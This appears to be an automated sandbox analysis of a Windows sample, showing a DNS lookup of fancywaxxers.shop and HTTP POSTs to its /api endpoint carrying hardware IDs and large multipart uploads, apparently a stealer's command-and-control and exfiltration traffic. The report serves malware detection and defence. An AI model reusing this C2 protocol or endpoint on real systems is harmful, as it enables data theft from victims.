                                                                                      Dec 31, 2024 09:43:09.582680941 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.582798958 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.582930088 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.583129883 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.583157063 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.032959938 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.032998085 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.033090115 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.033411980 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.033421993 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.488886118 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.488984108 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.490731955 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.490756989 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.490998983 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.492352962 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.493355036 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.493395090 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.493494987 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.493525028 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.493629932 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.493674994 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.493802071 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.493835926 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.493980885 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494012117 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.494151115 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494177103 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.494187117 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494201899 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.494327068 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494349003 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.494374990 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494507074 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.494537115 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.502316952 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.502487898 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.502533913 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:10.502616882 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.502727032 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:10.503879070 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:13.801944971 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:13.802059889 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:13.802148104 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:13.802309036 CET49736443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:13.802330017 CET44349736104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:13.835690975 CET49737443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:13.835747957 CET44349737104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:13.835834026 CET49737443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:13.836182117 CET49737443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:13.836199045 CET44349737104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:14.085649014 CET49737443192.168.2.4104.21.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 09:43:02.129168987 CET | 50288 | 53 | 192.168.2.4 | 1.1.1.1
Dec 31, 2024 09:43:02.141824007 CET | 53 | 50288 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 09:43:02.129168987 CET | 192.168.2.4 | 1.1.1.1 | 0x30e | Standard query (0) | fancywaxxers.shop | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 09:43:02.141824007 CET | 1.1.1.1 | 192.168.2.4 | 0x30e | No error (0) | fancywaxxers.shop | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:43:02.141824007 CET | 1.1.1.1 | 192.168.2.4 | 0x30e | No error (0) | fancywaxxers.shop | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:43:02.141824007 CET | 1.1.1.1 | 192.168.2.4 | 0x30e | No error (0) | fancywaxxers.shop | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:43:02.141824007 CET | 1.1.1.1 | 192.168.2.4 | 0x30e | No error (0) | fancywaxxers.shop | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:43:02.141824007 CET | 1.1.1.1 | 192.168.2.4 | 0x30e | No error (0) | fancywaxxers.shop | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:43:02.141824007 CET | 1.1.1.1 | 192.168.2.4 | 0x30e | No error (0) | fancywaxxers.shop | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:43:02.141824007 CET | 1.1.1.1 | 192.168.2.4 | 0x30e | No error (0) | fancywaxxers.shop | | 104.21.64.1 | A (IP address) | IN (0x0001) | false

                                                                                      • fancywaxxers.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.112.1 | 443 | 6940 | C:\Users\user\Desktop\x6VtGfW26X.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:43:02 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: fancywaxxers.shop
2024-12-31 08:43:02 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                      Data Ascii: act=life
2024-12-31 08:43:03 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:03 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=tnam0vvtdue50j6mvidh3pgf8k; expires=Sat, 26 Apr 2025 02:29:41 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v3mnXlXiL9ur%2FhDnYlYazgaA2cG1KXbknmBbywrmJTQSOjrNGAPRtdZ%2BKWfqOGfL4Sf%2Fsb3ZszBjgjvD2GMqOA3rfCtFjpJerhXzquH1uQo06GYgLk4WMrzsixUkP8Y7P%2BxD4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8face3e2dc34f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1464&rtt_var=570&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1885087&cwnd=181&unsent_bytes=0&cid=15b705e660dc086d&ts=499&x=0"
2024-12-31 08:43:03 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-31 08:43:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.112.1 | 443 | 6940 | C:\Users\user\Desktop\x6VtGfW26X.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:43:03 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 47
                                                                                      Host: fancywaxxers.shop
2024-12-31 08:43:03 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-31 08:43:04 UTC | 1146 | IN | HTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:04 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=k8266q6a09er3hri1s9142e8uc; expires=Sat, 26 Apr 2025 02:29:42 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JXSlorGqqX547QtIzdzh%2FgLr%2FD6V9X718vfbAjxR2YVXrqm6hVDiPzV%2F44%2FuFgFVDXfrd%2BT1V%2BgfDWEevHw0pV9m%2FY3%2FPw%2B2erlppZf9704RdtvTR%2BqHc%2F4CYkJng8kpcz57jA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8fad43c8a0f5b-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2198&min_rtt=1583&rtt_var=1033&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1844598&cwnd=221&unsent_bytes=0&cid=4eb9d6885c926bd0&ts=477&x=0"
                                                                                      Data Ascii: V/qghGSWXwsZTZitWTTe/s6OPb4nYcuKvtrd8CmAGVUCf7WkhRKvfqv4vElroA6MqWnJXQdASmu/SCrDCVCJpBIf0VRl9lsfLemcKWgV/oioaWjrAkXfju/d34V41PwwV/qghGSWXwsZTZitWTTe/s6OPb4nYcuKvt3M8hujGlQjLkFAEHNPf8xsTMjrwO4JLpipX9N1LoieGd7xCNHtZwP+0bEAEyuP2o/a2Wyw6uko6Wm6VzG+jkssG6QshYy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 104.21.112.1 | 443 | 6940 | C:\Users\user\Desktop\x6VtGfW26X.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:43:04 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=HCZVVRB9YU1BI9MGOFD
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 18169
                                                                                      Host: fancywaxxers.shop
2024-12-31 08:43:04 UTC | 15331 | OUT | Data Ascii:
--HCZVVRB9YU1BI9MGOFD
Content-Disposition: form-data; name="hwid"

0E8C58279CAE175520A4C476FD51BCB1
--HCZVVRB9YU1BI9MGOFD
Content-Disposition: form-data; name="pid"

2
--HCZVVRB9YU1BI9MGOFD
Content-Disposition: form-data; name="lid"

PsFKDg--pa
2024-12-31 08:43:05 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:05 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=eepkondoass7tr5ds05tf19q40; expires=Sat, 26 Apr 2025 02:29:44 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DA4F%2FrzShcQ1CT5DoYosJ7mmj7Kvetk8r%2FUo1tlYLMTW9ZCoSU7mfHeMd50Gj5eJLjZ1tarzn6cppqvPWGiwCz2SH5PxDgjYn6DE7UhCYPsip6uLTW1XH7A4DjR5QOc9VvU%2F6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8fadb8cf3c34f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1453&rtt_var=569&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19133&delivery_rate=1883870&cwnd=181&unsent_bytes=0&cid=8205377a64c703ae&ts=686&x=0"
2024-12-31 08:43:05 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-31 08:43:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 104.21.112.1 | 443 | 6940 | C:\Users\user\Desktop\x6VtGfW26X.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:43:06 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=T5H7PAQG41KHN8MHY7C
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8790
                                                                                      Host: fancywaxxers.shop
2024-12-31 08:43:06 UTC | 8790 | OUT | Data Ascii:
--T5H7PAQG41KHN8MHY7C
Content-Disposition: form-data; name="hwid"

0E8C58279CAE175520A4C476FD51BCB1
--T5H7PAQG41KHN8MHY7C
Content-Disposition: form-data; name="pid"

2
--T5H7PAQG41KHN8MHY7C
Content-Disposition: form-data; name="lid"

PsFKDg--pa
2024-12-31 08:43:06 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:06 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=pbs9ggrfar1ufgp8oabqa6j33v; expires=Sat, 26 Apr 2025 02:29:45 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNFpsVUXzLyRO508CO7MX7aEkICtT%2BaixcylrAKFba9b%2FcQSYzL8rUcReBairgGamP2R5iBcK6ZJzupAiZV1zldEJJtygQpAiG2vHrbymb5uNI2zq481fLpqzPVm6TI1vv%2BYog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8fae34db443b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1571&rtt_var=612&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9731&delivery_rate=1753753&cwnd=203&unsent_bytes=0&cid=5173935186ec6486&ts=751&x=0"
2024-12-31 08:43:06 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-31 08:43:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 104.21.112.1 | 443 | 6940 | C:\Users\user\Desktop\x6VtGfW26X.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:43:07 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=7ZJUYBBS9X5
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 20395
                                                                                      Host: fancywaxxers.shop
2024-12-31 08:43:07 UTC | 15331 | OUT | Data Ascii:
--7ZJUYBBS9X5
Content-Disposition: form-data; name="hwid"

0E8C58279CAE175520A4C476FD51BCB1
--7ZJUYBBS9X5
Content-Disposition: form-data; name="pid"

3
--7ZJUYBBS9X5
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--7ZJUYBBS9X5
Cont
2024-12-31 08:43:08 UTC | 1139 | IN | HTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:08 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=puelpvtkkp8u44b04cf73ufbh9; expires=Sat, 26 Apr 2025 02:29:46 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gt7dlyX30YR7k5GTGf%2FYW5DaW5a2LAVrB9xNfw0CSnjEEWh3gYPJ659FdJ9%2F11S3NwUPVcVoLD8h7MnF3Lh29JieEHl6%2Fg%2BxJcbdXvt%2FYaNApXcxFGw%2BwgYpWmL3CxkG1IOOUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8faecdd1243b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1537&rtt_var=610&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21351&delivery_rate=1744324&cwnd=203&unsent_bytes=0&cid=262e69ca552bbc89&ts=621&x=0"
2024-12-31 08:43:08 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-31 08:43:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49735 | 104.21.112.1 | 443 | 6940 | C:\Users\user\Desktop\x6VtGfW26X.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:43:09 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=6OPMM33SI10YDMKDTM
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 1248
                                                                                      Host: fancywaxxers.shop
2024-12-31 08:43:09 UTC | 1248 | OUT | Data Ascii:
--6OPMM33SI10YDMKDTM
Content-Disposition: form-data; name="hwid"

0E8C58279CAE175520A4C476FD51BCB1
--6OPMM33SI10YDMKDTM
Content-Disposition: form-data; name="pid"

1
--6OPMM33SI10YDMKDTM
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
2024-12-31 08:43:09 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:09 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=to5tn469fkmpcl0702hefn8hmo; expires=Sat, 26 Apr 2025 02:29:48 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S0%2Be1TumCJDHoNijgjxF4h%2FV5LlIwZQ4CpM%2FkTzVhrjwmxxm1stW5IbjaKdI0ini37Z5cCYMSrUErG7IHcnV34rQ9Kgv1UQumB9z1oYZ3Sdj0nDMcyOhP3qZXcPDKkv2k1Y1UQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8faf69c0943b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=21894&min_rtt=1615&rtt_var=12732&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2166&delivery_rate=1808049&cwnd=203&unsent_bytes=0&cid=4bbf4144e9f732d7&ts=433&x=0"
2024-12-31 08:43:09 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-31 08:43:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49736 | 104.21.112.1 | 443 | 6940 | C:\Users\user\Desktop\x6VtGfW26X.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:43:10 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=N4Y16TNE0FZYKU
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 569055
                                                                                      Host: fancywaxxers.shop
2024-12-31 08:43:10 UTC | 15331 | OUT | Data Ascii:
--N4Y16TNE0FZYKU
Content-Disposition: form-data; name="hwid"

0E8C58279CAE175520A4C476FD51BCB1
--N4Y16TNE0FZYKU
Content-Disposition: form-data; name="pid"

1
--N4Y16TNE0FZYKU
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--N4Y16TNE
2024-12-31 08:43:13 UTC  1145  IN  HTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:13 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=9s75eunm7mg6l3f05889ijh5mp; expires=Sat, 26 Apr 2025 02:29:50 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=18RW9OT31w4Ac%2FIe%2Fq8zm%2FC2jyYrQoPqk5FtL%2Bd5eP4LRvaLmQmfw%2BZnbjJCpQX9tMsBBFGbydxC%2Bw1unQ1QlcpyPnnK7jcV6n0WO685XQ708zvoDI1mTtWp%2BH3Z6fcqf3OsSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8fafeef48c34f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1471&rtt_var=566&sent=339&recv=590&lost=0&retrans=0&sent_bytes=2844&recv_bytes=571599&delivery_rate=1907250&cwnd=181&unsent_bytes=0&cid=c9e0d0b559c18b80&ts=3318&x=0"


Target ID: 0
Start time: 03:42:58
Start date: 31/12/2024
Path: C:\Users\user\Desktop\x6VtGfW26X.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\x6VtGfW26X.exe"
Imagebase: 0x7b0000
File size: 1'883'648 bytes
MD5 hash: C17D20E6BE092651357A8B466257B795
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

                                                                                        Execution Graph

Execution Coverage: 2.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 63.6%
Total number of Nodes: 280
Total number of Limit Nodes: 23

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • SysAllocString.OLEAUT32(k2`0), ref: 007E8B60
                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 007E8B9E
                                                                                        • SysFreeString.OLEAUT32(?), ref: 007E8EB3
                                                                                        • SysFreeString.OLEAUT32(?), ref: 007E8EB9
                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 007E8EFA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
